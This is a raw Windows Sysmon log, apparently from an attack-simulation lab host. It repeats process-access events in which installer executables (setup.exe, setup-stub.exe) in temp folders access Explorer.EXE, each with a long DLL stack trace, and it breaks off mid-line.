13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014673Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014672Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014671Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014670Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014669Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014668Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014667Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014666Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64) 10341000x800000000000000014665Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014664Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64) 10341000x800000000000000014663Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014662Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64) 10341000x800000000000000014661Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014660Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64) 10341000x800000000000000014659Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014658Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64) 10341000x800000000000000014657Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64) 10341000x800000000000000014656Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.271{59A5CD1D-944E-6005-2205-00000000A301}61206736C:\Users\ADMINI~1\AppData\Local\Temp\7zSC8636DE7\setup-stub.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+16ad7|C:\Windows\System32\wow64.dll+169cf|C:\Windows\SYSTEM32\ntdll.dll+a90ae|C:\Windows\System32\wow64cpu.dll+223c|C:\Windows\System32\wow64cpu.dll+1d9a|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERN